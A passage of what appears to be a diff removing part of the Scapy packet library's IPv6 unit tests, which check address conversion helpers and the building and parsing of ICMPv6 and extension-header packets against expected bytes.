(test 5) -in6_ifaceidtomac(in6_mactoifaceid("FF:00:00:00:00:00", ulbit=1)) == 'fd:00:00:00:00:00' - -= in6_mactoifaceid() conversion function (test 6) -in6_ifaceidtomac(in6_mactoifaceid("FF:00:00:00:00:00", ulbit=0)) == 'ff:00:00:00:00:00' - - -= in6_addrtomac() conversion function (test 1) -in6_addrtomac("FE80::" + in6_mactoifaceid("FD:00:00:00:00:00", ulbit=0)) == 'ff:00:00:00:00:00' - -= in6_addrtomac() conversion function (test 2) -in6_addrtomac("FE80::" + in6_mactoifaceid("FD:00:00:00:00:00", ulbit=1)) == 'fd:00:00:00:00:00' - -= in6_addrtomac() conversion function (test 3) -in6_addrtomac("FE80::" + in6_mactoifaceid("FD:00:00:00:00:00")) == 'fd:00:00:00:00:00' - -= in6_addrtomac() conversion function (test 4) -in6_addrtomac("FE80::" + in6_mactoifaceid("FF:00:00:00:00:00")) == 'ff:00:00:00:00:00' - -= in6_addrtomac() conversion function (test 5) -in6_addrtomac("FE80::" + in6_mactoifaceid("FF:00:00:00:00:00", ulbit=1)) == 'fd:00:00:00:00:00' - -= in6_addrtomac() conversion function (test 6) -in6_addrtomac("FE80::" + in6_mactoifaceid("FF:00:00:00:00:00", ulbit=0)) == 'ff:00:00:00:00:00' - -########### RFC 3041 related function ############################### -= Test in6_getRandomizedIfaceId - -import socket - -for a in six.moves.range(10): - s1, s2 = in6_getRandomizedIfaceId('20b:93ff:feeb:2d3') - s1, s2 - tmp = inet_pton(socket.AF_INET6, "::" + s1)[8:] - tmp - assert (orb(tmp[0]) & 0x04) == 0 - s1, s2 = in6_getRandomizedIfaceId('20b:93ff:feeb:2d3', previous=s2) - s1, s2 - tmp = inet_pton(socket.AF_INET6, "::" + s1)[8:] - assert (orb(tmp[0]) & 0x04) == 0 - -assert in6_getRandomizedIfaceId('20b:93ff:feeb:2d3', previous='d006:d540:db11:b092') == ('721f:11fa:3743:fc7f', '5946:5272:7fcc:108a') - -########### RFC 1924 related function ############################### -= Test RFC 1924 function - in6_ctop() basic test -in6_ctop("4)+k&C#VzJ4br>0wv%Yp") == '1080::8:800:200c:417a' - -= Test RFC 1924 function - in6_ctop() with character outside charset -in6_ctop("4)+k&C#VzJ4br>0wv%Y'") == None - -= Test RFC 1924 function - in6_ctop() with bad length address -in6_ctop("4)+k&C#VzJ4br>0wv%Y") == None - -= Test RFC 1924 function - in6_ptoc() basic test -in6_ptoc('1080::8:800:200c:417a') == '4)+k&C#VzJ4br>0wv%Yp' - -= Test RFC 1924 function - in6_ptoc() basic test -in6_ptoc('1080::8:800:200c:417a') == '4)+k&C#VzJ4br>0wv%Yp' - -= Test RFC 1924 function - in6_ptoc() with bad input -in6_ptoc('1080:::8:800:200c:417a') == None - -########### in6_getAddrType ######################################### - -= in6_getAddrType - 6to4 addresses -in6_getAddrType("2002::1") == (IPV6_ADDR_UNICAST | IPV6_ADDR_GLOBAL | IPV6_ADDR_6TO4) - -= in6_getAddrType - Assignable Unicast global address -in6_getAddrType("2001:db8::1") == (IPV6_ADDR_UNICAST | IPV6_ADDR_GLOBAL) - -= in6_getAddrType - Multicast global address -in6_getAddrType("FF0E::1") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_MULTICAST) - -= in6_getAddrType - Multicast local address -in6_getAddrType("FF02::1") == (IPV6_ADDR_LINKLOCAL | IPV6_ADDR_MULTICAST) - -= in6_getAddrType - Unicast Link-Local address -in6_getAddrType("FE80::") == (IPV6_ADDR_UNICAST | IPV6_ADDR_LINKLOCAL) - -= in6_getAddrType - Loopback address -in6_getAddrType("::1") == IPV6_ADDR_LOOPBACK - -= in6_getAddrType - Unspecified address -in6_getAddrType("::") == IPV6_ADDR_UNSPECIFIED - -= in6_getAddrType - Unassigned Global Unicast address -in6_getAddrType("4000::") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) - -= in6_getAddrType - Weird address (FE::1) -in6_getAddrType("FE::") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) - -= in6_getAddrType - Weird address (FE8::1) -in6_getAddrType("FE8::1") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) - -= in6_getAddrType - Weird address (1::1) -in6_getAddrType("1::1") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) - -= in6_getAddrType - Weird address (1000::1) -in6_getAddrType("1000::1") == (IPV6_ADDR_GLOBAL | IPV6_ADDR_UNICAST) - -########### ICMPv6DestUnreach Class ################################# - -= ICMPv6DestUnreach Class - Basic Build (no argument) -raw(ICMPv6DestUnreach()) == b'\x01\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6DestUnreach Class - Basic Build over IPv6 (for cksum and overload) -raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach()) == b'`\x00\x00\x00\x00\x08:@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x01\x00\x14e\x00\x00\x00\x00' - -= ICMPv6DestUnreach Class - Basic Build over IPv6 with some payload -raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach()/IPv6(src="2047::cafe", dst="2048::deca")) == b'`\x00\x00\x00\x000:@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x01\x00\x8e\xa3\x00\x00\x00\x00`\x00\x00\x00\x00\x00;@ G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca' - -= ICMPv6DestUnreach Class - Dissection with default values and some payload -a = IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach()/IPv6(src="2047::cafe", dst="2048::deca"))) -a.plen == 48 and a.nh == 58 and ICMPv6DestUnreach in a and a[ICMPv6DestUnreach].type == 1 and a[ICMPv6DestUnreach].code == 0 and a[ICMPv6DestUnreach].cksum == 0x8ea3 and a[ICMPv6DestUnreach].unused == 0 and IPerror6 in a - -= ICMPv6DestUnreach Class - Dissection with specific values -a=IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach(code=1, cksum=0x6666, unused=0x7777)/IPv6(src="2047::cafe", dst="2048::deca"))) -a.plen == 48 and a.nh == 58 and ICMPv6DestUnreach in a and a[ICMPv6DestUnreach].type == 1 and a[ICMPv6DestUnreach].cksum == 0x6666 and a[ICMPv6DestUnreach].unused == 0x7777 and IPerror6 in a[ICMPv6DestUnreach] - -= ICMPv6DestUnreach Class - checksum computation related stuff -a=IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6DestUnreach(code=1, cksum=0x6666, unused=0x7777)/IPv6(src="2047::cafe", dst="2048::deca")/TCP())) -b=IPv6(raw(IPv6(src="2047::cafe", dst="2048::deca")/TCP())) -a[ICMPv6DestUnreach][TCPerror].chksum == b.chksum - - -########### ICMPv6PacketTooBig Class ################################ - -= ICMPv6PacketTooBig Class - Basic Build (no argument) -raw(ICMPv6PacketTooBig()) == b'\x02\x00\x00\x00\x00\x00\x05\x00' - -= ICMPv6PacketTooBig Class - Basic Build over IPv6 (for cksum and overload) -raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig()) == b'`\x00\x00\x00\x00\x08:@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x02\x00\x0ee\x00\x00\x05\x00' - -= ICMPv6PacketTooBig Class - Basic Build over IPv6 with some payload -raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig()/IPv6(src="2047::cafe", dst="2048::deca")) == b'`\x00\x00\x00\x000:@ H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x02\x00\x88\xa3\x00\x00\x05\x00`\x00\x00\x00\x00\x00;@ G\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca' - -= ICMPv6PacketTooBig Class - Dissection with default values and some payload -a = IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig()/IPv6(src="2047::cafe", dst="2048::deca"))) -a.plen == 48 and a.nh == 58 and ICMPv6PacketTooBig in a and a[ICMPv6PacketTooBig].type == 2 and a[ICMPv6PacketTooBig].code == 0 and a[ICMPv6PacketTooBig].cksum == 0x88a3 and a[ICMPv6PacketTooBig].mtu == 1280 and IPerror6 in a -True - -= ICMPv6PacketTooBig Class - Dissection with specific values -a=IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig(code=2, cksum=0x6666, mtu=1460)/IPv6(src="2047::cafe", dst="2048::deca"))) -a.plen == 48 and a.nh == 58 and ICMPv6PacketTooBig in a and a[ICMPv6PacketTooBig].type == 2 and a[ICMPv6PacketTooBig].code == 2 and a[ICMPv6PacketTooBig].cksum == 0x6666 and a[ICMPv6PacketTooBig].mtu == 1460 and IPerror6 in a - -= ICMPv6PacketTooBig Class - checksum computation related stuff -a=IPv6(raw(IPv6(src="2048::deca", dst="2047::cafe")/ICMPv6PacketTooBig(code=1, cksum=0x6666, mtu=0x7777)/IPv6(src="2047::cafe", dst="2048::deca")/TCP())) -b=IPv6(raw(IPv6(src="2047::cafe", dst="2048::deca")/TCP())) -a[ICMPv6PacketTooBig][TCPerror].chksum == b.chksum - - -########### ICMPv6TimeExceeded Class ################################ -# To be done but not critical. Same mechanisms and format as -# previous ones. - -########### ICMPv6ParamProblem Class ################################ -# See previous note - -############ -############ -+ Test ICMPv6EchoRequest Class - -= ICMPv6EchoRequest - Basic Instantiation -raw(ICMPv6EchoRequest()) == b'\x80\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6EchoRequest - Instantiation with specific values -raw(ICMPv6EchoRequest(code=0xff, cksum=0x1111, id=0x2222, seq=0x3333, data="thisissomestring")) == b'\x80\xff\x11\x11""33thisissomestring' - -= ICMPv6EchoRequest - Basic dissection -a=ICMPv6EchoRequest(b'\x80\x00\x00\x00\x00\x00\x00\x00') -a.type == 128 and a.code == 0 and a.cksum == 0 and a.id == 0 and a.seq == 0 and a.data == b"" - -= ICMPv6EchoRequest - Dissection with specific values -a=ICMPv6EchoRequest(b'\x80\xff\x11\x11""33thisissomerawing') -a.type == 128 and a.code == 0xff and a.cksum == 0x1111 and a.id == 0x2222 and a.seq == 0x3333 and a.data == b"thisissomerawing" - -= ICMPv6EchoRequest - Automatic checksum computation and field overloading (build) -raw(IPv6(dst="2001::cafe", src="2001::deca", hlim=64)/ICMPv6EchoRequest()) == b'`\x00\x00\x00\x00\x08:@ \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x80\x00\x95\xf1\x00\x00\x00\x00' - -= ICMPv6EchoRequest - Automatic checksum computation and field overloading (dissection) -a=IPv6(b'`\x00\x00\x00\x00\x08:@ \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x80\x00\x95\xf1\x00\x00\x00\x00') -isinstance(a, IPv6) and a.nh == 58 and isinstance(a.payload, ICMPv6EchoRequest) and a.payload.cksum == 0x95f1 - - -############ -############ -+ Test ICMPv6EchoReply Class - -= ICMPv6EchoReply - Basic Instantiation -raw(ICMPv6EchoReply()) == b'\x81\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6EchoReply - Instantiation with specific values -raw(ICMPv6EchoReply(code=0xff, cksum=0x1111, id=0x2222, seq=0x3333, data="thisissomestring")) == b'\x81\xff\x11\x11""33thisissomestring' - -= ICMPv6EchoReply - Basic dissection -a=ICMPv6EchoReply(b'\x80\x00\x00\x00\x00\x00\x00\x00') -a.type == 128 and a.code == 0 and a.cksum == 0 and a.id == 0 and a.seq == 0 and a.data == b"" - -= ICMPv6EchoReply - Dissection with specific values -a=ICMPv6EchoReply(b'\x80\xff\x11\x11""33thisissomerawing') -a.type == 128 and a.code == 0xff and a.cksum == 0x1111 and a.id == 0x2222 and a.seq == 0x3333 and a.data == b"thisissomerawing" - -= ICMPv6EchoReply - Automatic checksum computation and field overloading (build) -raw(IPv6(dst="2001::cafe", src="2001::deca", hlim=64)/ICMPv6EchoReply()) == b'`\x00\x00\x00\x00\x08:@ \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x81\x00\x94\xf1\x00\x00\x00\x00' - -= ICMPv6EchoReply - Automatic checksum computation and field overloading (dissection) -a=IPv6(b'`\x00\x00\x00\x00\x08:@ \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xde\xca \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe\x80\x00\x95\xf1\x00\x00\x00\x00') -isinstance(a, IPv6) and a.nh == 58 and isinstance(a.payload, ICMPv6EchoRequest) and a.payload.cksum == 0x95f1 - -########### ICMPv6EchoReply/Request answers() and hashret() ######### - -= ICMPv6EchoRequest and ICMPv6EchoReply - hashret() test 1 -b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(data="somedata") -a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(data="somedata") -b.hashret() == a.hashret() - -# data are not taken into account for hashret -= ICMPv6EchoRequest and ICMPv6EchoReply - hashret() test 2 -b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(data="somedata") -a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(data="otherdata") -b.hashret() == a.hashret() - -= ICMPv6EchoRequest and ICMPv6EchoReply - hashret() test 3 -b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(id=0x6666, seq=0x7777,data="somedata") -a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(id=0x6666, seq=0x8888, data="somedata") -b.hashret() != a.hashret() - -= ICMPv6EchoRequest and ICMPv6EchoReply - hashret() test 4 -b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(id=0x6666, seq=0x7777,data="somedata") -a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(id=0x8888, seq=0x7777, data="somedata") -b.hashret() != a.hashret() - -= ICMPv6EchoRequest and ICMPv6EchoReply - answers() test 5 -b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(data="somedata") -a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(data="somedata") -(a > b) == True - -= ICMPv6EchoRequest and ICMPv6EchoReply - answers() test 6 -b=IPv6(src="2047::deca", dst="2048::cafe")/ICMPv6EchoReply(id=0x6666, seq=0x7777, data="somedata") -a=IPv6(src="2048::cafe", dst="2047::deca")/ICMPv6EchoRequest(id=0x6666, seq=0x7777, data="somedata") -(a > b) == True - -= ICMPv6EchoRequest and ICMPv6EchoReply - live answers() use Net6 -~ netaccess ipv6 - -a = IPv6(dst="www.google.com")/ICMPv6EchoRequest() -b = IPv6(src="www.google.com", dst=a.src)/ICMPv6EchoReply() -assert b.answers(a) -assert (a > b) - - -########### ICMPv6MRD* Classes ###################################### - -= ICMPv6MRD_Advertisement - Basic instantiation -raw(ICMPv6MRD_Advertisement()) == b'\x97\x14\x00\x00\x00\x00\x00\x00' - -= ICMPv6MRD_Advertisement - Instantiation with specific values -raw(ICMPv6MRD_Advertisement(advinter=0xdd, queryint=0xeeee, robustness=0xffff)) == b'\x97\xdd\x00\x00\xee\xee\xff\xff' - -= ICMPv6MRD_Advertisement - Basic Dissection and overloading mechanisms -a=Ether(raw(Ether()/IPv6()/ICMPv6MRD_Advertisement())) -a.dst == "33:33:00:00:00:02" and IPv6 in a and a[IPv6].plen == 8 and a[IPv6].nh == 58 and a[IPv6].hlim == 1 and a[IPv6].dst == "ff02::2" and ICMPv6MRD_Advertisement in a and a[ICMPv6MRD_Advertisement].type == 151 and a[ICMPv6MRD_Advertisement].advinter == 20 and a[ICMPv6MRD_Advertisement].queryint == 0 and a[ICMPv6MRD_Advertisement].robustness == 0 - - -= ICMPv6MRD_Solicitation - Basic dissection -raw(ICMPv6MRD_Solicitation()) == b'\x98\x00\x00\x00' - -= ICMPv6MRD_Solicitation - Instantiation with specific values -raw(ICMPv6MRD_Solicitation(res=0xbb)) == b'\x98\xbb\x00\x00' - -= ICMPv6MRD_Solicitation - Basic Dissection and overloading mechanisms -a=Ether(raw(Ether()/IPv6()/ICMPv6MRD_Solicitation())) -a.dst == "33:33:00:00:00:02" and IPv6 in a and a[IPv6].plen == 4 and a[IPv6].nh == 58 and a[IPv6].hlim == 1 and a[IPv6].dst == "ff02::2" and ICMPv6MRD_Solicitation in a and a[ICMPv6MRD_Solicitation].type == 152 and a[ICMPv6MRD_Solicitation].res == 0 - - -= ICMPv6MRD_Termination Basic instantiation -raw(ICMPv6MRD_Termination()) == b'\x99\x00\x00\x00' - -= ICMPv6MRD_Termination - Instantiation with specific values -raw(ICMPv6MRD_Termination(res=0xbb)) == b'\x99\xbb\x00\x00' - -= ICMPv6MRD_Termination - Basic Dissection and overloading mechanisms -a=Ether(raw(Ether()/IPv6()/ICMPv6MRD_Termination())) -a.dst == "33:33:00:00:00:6a" and IPv6 in a and a[IPv6].plen == 4 and a[IPv6].nh == 58 and a[IPv6].hlim == 1 and a[IPv6].dst == "ff02::6a" and ICMPv6MRD_Termination in a and a[ICMPv6MRD_Termination].type == 153 and a[ICMPv6MRD_Termination].res == 0 - - -############ -############ -+ Test HBHOptUnknown Class - -= HBHOptUnknown - Basic Instantiation -raw(HBHOptUnknown()) == b'\x01\x00' - -= HBHOptUnknown - Basic Dissection -a=HBHOptUnknown(b'\x01\x00') -a.otype == 0x01 and a.optlen == 0 and a.optdata == b"" - -= HBHOptUnknown - Automatic optlen computation -raw(HBHOptUnknown(optdata="B"*10)) == b'\x01\nBBBBBBBBBB' - -= HBHOptUnknown - Instantiation with specific values -raw(HBHOptUnknown(optlen=9, optdata="B"*10)) == b'\x01\tBBBBBBBBBB' - -= HBHOptUnknown - Dissection with specific values -a=HBHOptUnknown(b'\x01\tBBBBBBBBBB') -a.otype == 0x01 and a.optlen == 9 and a.optdata == b"B"*9 and isinstance(a.payload, Raw) and a.payload.load == b"B" - - -############ -############ -+ Test Pad1 Class - -= Pad1 - Basic Instantiation -raw(Pad1()) == b'\x00' - -= Pad1 - Basic Dissection -raw(Pad1(b'\x00')) == b'\x00' - - -############ -############ -+ Test PadN Class - -= PadN - Basic Instantiation -raw(PadN()) == b'\x01\x00' - -= PadN - Optlen Automatic computation -raw(PadN(optdata="B"*10)) == b'\x01\nBBBBBBBBBB' - -= PadN - Basic Dissection -a=PadN(b'\x01\x00') -a.otype == 1 and a.optlen == 0 and a.optdata == b"" - -= PadN - Dissection with specific values -a=PadN(b'\x01\x0cBBBBBBBBBB') -a.otype == 1 and a.optlen == 12 and a.optdata == b'BBBBBBBBBB' - -= PadN - Instantiation with forced optlen -raw(PadN(optdata="B"*10, optlen=9)) == b'\x01\x09BBBBBBBBBB' - - -############ -############ -+ Test RouterAlert Class (RFC 2711) - -= RouterAlert - Basic Instantiation -raw(RouterAlert()) == b'\x05\x02\x00\x00' - -= RouterAlert - Basic Dissection -a=RouterAlert(b'\x05\x02\x00\x00') -a.otype == 0x05 and a.optlen == 2 and a.value == 00 - -= RouterAlert - Instantiation with specific values -raw(RouterAlert(optlen=3, value=0xffff)) == b'\x05\x03\xff\xff' - -= RouterAlert - Instantiation with specific values -a=RouterAlert(b'\x05\x03\xff\xff') -a.otype == 0x05 and a.optlen == 3 and a.value == 0xffff - - -############ -############ -+ Test Jumbo Class (RFC 2675) - -= Jumbo - Basic Instantiation -raw(Jumbo()) == b'\xc2\x04\x00\x00\x00\x00' - -= Jumbo - Basic Dissection -a=Jumbo(b'\xc2\x04\x00\x00\x00\x00') -a.otype == 0xC2 and a.optlen == 4 and a.jumboplen == 0 - -= Jumbo - Instantiation with specific values -raw(Jumbo(optlen=6, jumboplen=0xffffffff)) == b'\xc2\x06\xff\xff\xff\xff' - -= Jumbo - Dissection with specific values -a=Jumbo(b'\xc2\x06\xff\xff\xff\xff') -a.otype == 0xc2 and a.optlen == 6 and a.jumboplen == 0xffffffff - - -############ -############ -+ Test HAO Class (RFC 3775) - -= HAO - Basic Instantiation -raw(HAO()) == b'\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= HAO - Basic Dissection -a=HAO(b'\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') -a.otype == 0xC9 and a.optlen == 16 and a.hoa == "::" - -= HAO - Instantiation with specific values -raw(HAO(optlen=9, hoa="2001::ffff")) == b'\xc9\t \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff' - -= HAO - Dissection with specific values -a=HAO(b'\xc9\t \x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff') -a.otype == 0xC9 and a.optlen == 9 and a.hoa == "2001::ffff" - -= HAO - hashret - -p = IPv6()/IPv6ExtHdrDestOpt(options=HAO(hoa="2001:db8::1"))/ICMPv6EchoRequest() -p.hashret() == b' \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00:\x00\x00\x00\x00' - - -############ -############ -+ Test IPv6ExtHdrHopByHop() - -= IPv6ExtHdrHopByHop - Basic Instantiation -raw(IPv6ExtHdrHopByHop()) == b';\x00\x01\x04\x00\x00\x00\x00' - -= IPv6ExtHdrHopByHop - Instantiation with HAO option -raw(IPv6ExtHdrHopByHop(options=[HAO()])) == b';\x02\x01\x02\x00\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= IPv6ExtHdrHopByHop - Instantiation with RouterAlert option -raw(IPv6ExtHdrHopByHop(options=[RouterAlert()])) == b';\x00\x05\x02\x00\x00\x01\x00' - -= IPv6ExtHdrHopByHop - Instantiation with Jumbo option -raw(IPv6ExtHdrHopByHop(options=[Jumbo()])) == b';\x00\xc2\x04\x00\x00\x00\x00' - -= IPv6ExtHdrHopByHop - Complete dissection with Jumbo option -s = b'`\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x00\xc2\x04\x00\x00\x00\x10\x80\x00\x7f\xbb\x00\x00\x00\x00' -p = IPv6(s) -assert IPv6ExtHdrHopByHop in p and Jumbo in p and ICMPv6EchoRequest in p - -s = b'`\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01:\x01\x01\x06\x00\x00\x00\x00\x00\x00\xc2\x04\x00\x00\x00\x18\x80\x00\x7f\xbb\x00\x00\x00\x00' -p = IPv6(s) -assert IPv6ExtHdrHopByHop in p and PadN in p and Jumbo in p and ICMPv6EchoRequest in p - -= IPv6ExtHdrHopByHop - Instantiation with Pad1 option -raw(IPv6ExtHdrHopByHop(options=[Pad1()])) == b';\x00\x00\x01\x03\x00\x00\x00' - -= IPv6ExtHdrHopByHop - Instantiation with PadN option -raw(IPv6ExtHdrHopByHop(options=[Pad1()])) == b';\x00\x00\x01\x03\x00\x00\x00' - -= IPv6ExtHdrHopByHop - Instantiation with Jumbo, RouterAlert, HAO -raw(IPv6ExtHdrHopByHop(options=[Jumbo(), RouterAlert(), HAO()])) == b';\x03\xc2\x04\x00\x00\x00\x00\x05\x02\x00\x00\x01\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' - -= IPv6ExtHdrHopByHop - Instantiation with HAO, Jumbo, RouterAlert -raw(IPv6ExtHdrHopByHop(options=[HAO(), Jumbo(), RouterAlert()])) == b';\x04\x01\x02\x00\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\xc2\x04\x00\x00\x00\x00\x05\x02\x00\x00\x01\x02\x00\x00' - -= IPv6ExtHdrHopByHop - Instantiation with RouterAlert, HAO, Jumbo -raw(IPv6ExtHdrHopByHop(options=[RouterAlert(), HAO(), Jumbo()])) == b';\x03\x05\x02\x00\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\xc2\x04\x00\x00\x00\x00' - -= IPv6ExtHdrHopByHop - Hashret -(IPv6(src="::1", dst="::1")/IPv6ExtHdrHopByHop()).hashret() == b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;' - -= IPv6ExtHdrHopByHop - Basic Dissection -a=IPv6ExtHdrHopByHop(b';\x00\x01\x04\x00\x00\x00\x00') -a.nh == 59 and a.len == 0 and len(a.options) == 1 and isinstance(a.options[0], PadN) and a.options[0].otype == 1 and a.options[0].optlen == 4 and a.options[0].optdata == b'\x00'*4 - -#= IPv6ExtHdrHopByHop - Automatic length computation -#raw(IPv6ExtHdrHopByHop(options=["toto"])) == b'\x00\x00toto' -#= IPv6ExtHdrHopByHop - Automatic length computation -#raw(IPv6ExtHdrHopByHop(options=["toto"])) == b'\x00\x00tototo' - - -############ -############ -+ Test ICMPv6ND_RS() class - ICMPv6 Type 133 Code 0 - -= ICMPv6ND_RS - Basic instantiation -raw(ICMPv6ND_RS()) == b'\x85\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6ND_RS - Basic instantiation with empty dst in IPv6 underlayer -raw(IPv6(src="2001:db8::1")/ICMPv6ND_RS()) == b'`\x00\x00\x00\x00\x08:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x85\x00M\xfe\x00\x00\x00\x00' - -= ICMPv6ND_RS - Basic dissection -a=ICMPv6ND_RS(b'\x85\x00\x00\x00\x00\x00\x00\x00') -a.type == 133 and a.code == 0 and a.cksum == 0 and a.res == 0 - -= ICMPv6ND_RS - Basic instantiation with empty dst in IPv6 underlayer -a=IPv6(b'`\x00\x00\x00\x00\x08:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x85\x00M\xfe\x00\x00\x00\x00') -assert isinstance(a, IPv6) and a.nh == 58 and a.hlim == 255 and isinstance(a.payload, ICMPv6ND_RS) and a.payload.type == 133 and a.payload.code == 0 and a.payload.cksum == 0x4dfe and a.payload.res == 0 -assert a.hashret() == b":" - - -############ -############ -+ Test ICMPv6ND_RA() class - ICMPv6 Type 134 Code 0 - -= ICMPv6ND_RA - Basic Instantiation -raw(ICMPv6ND_RA()) == b'\x86\x00\x00\x00\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6ND_RA - Basic instantiation with empty dst in IPv6 underlayer -raw(IPv6(src="2001:db8::1")/ICMPv6ND_RA()) == b'`\x00\x00\x00\x00\x10:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86\x00E\xe7\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00' - -= ICMPv6ND_RA - Basic dissection -a=ICMPv6ND_RA(b'\x86\x00\x00\x00\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00') -a.type == 134 and a.code == 0 and a.cksum == 0 and a.chlim == 0 and a.M == 0 and a.O == 0 and a.H == 0 and a.prf == 1 and a.res == 0 and a.routerlifetime == 1800 and a.reachabletime == 0 and a.retranstimer == 0 - -= ICMPv6ND_RA - Basic instantiation with empty dst in IPv6 underlayer -a=IPv6(b'`\x00\x00\x00\x00\x10:\xff \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86\x00E\xe7\x00\x08\x07\x08\x00\x00\x00\x00\x00\x00\x00\x00') -isinstance(a, IPv6) and a.nh == 58 and a.hlim == 255 and isinstance(a.payload, ICMPv6ND_RA) and a.payload.type == 134 and a.code == 0 and a.cksum == 0x45e7 and a.chlim == 0 and a.M == 0 and a.O == 0 and a.H == 0 and a.prf == 1 and a.res == 0 and a.routerlifetime == 1800 and a.reachabletime == 0 and a.retranstimer == 0 - -= ICMPv6ND_RA - Answers -assert ICMPv6ND_RA().answers(ICMPv6ND_RS()) -a=IPv6(b'`\x00\x00\x00\x00\x10:\xff 